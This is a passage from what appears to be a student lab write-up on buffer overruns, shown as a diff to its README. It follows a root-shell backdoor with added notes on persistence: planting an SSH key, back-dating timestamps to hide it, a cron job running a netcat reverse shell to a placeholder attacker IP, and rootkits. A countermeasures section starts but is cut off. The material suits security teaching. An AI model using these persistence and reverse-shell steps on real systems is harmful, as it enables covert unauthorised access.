MLucasZ/TDA602-buffer-overruns/README.md

 Now, when we execute`./backdoor` with the user dvader, we gain access to a root shell.

+We could also use more hidden methods:
+- add our ssh public key in the list of authorized keys, the root admin could eventually see that it appeared (more difficult if we edit the last modification timestamp using `touch -t YYYYMMDDhhmm <file>`)
+- using a cron job that periodically run a reverse shell regularly using netcat `nc -e /bin/bash <ATTACKER_IP> <PORT>`, netcat is not installed on this machine so this exploit would be more suite for Debian or Ubuntu systems which are more common nowadays
+- using a rootkit, which is much more discrete when it comes to regaining access, rootkit detection can be harder to detect than previous methods

 ### Part 3 : Countermeasures

 - Canaries : ...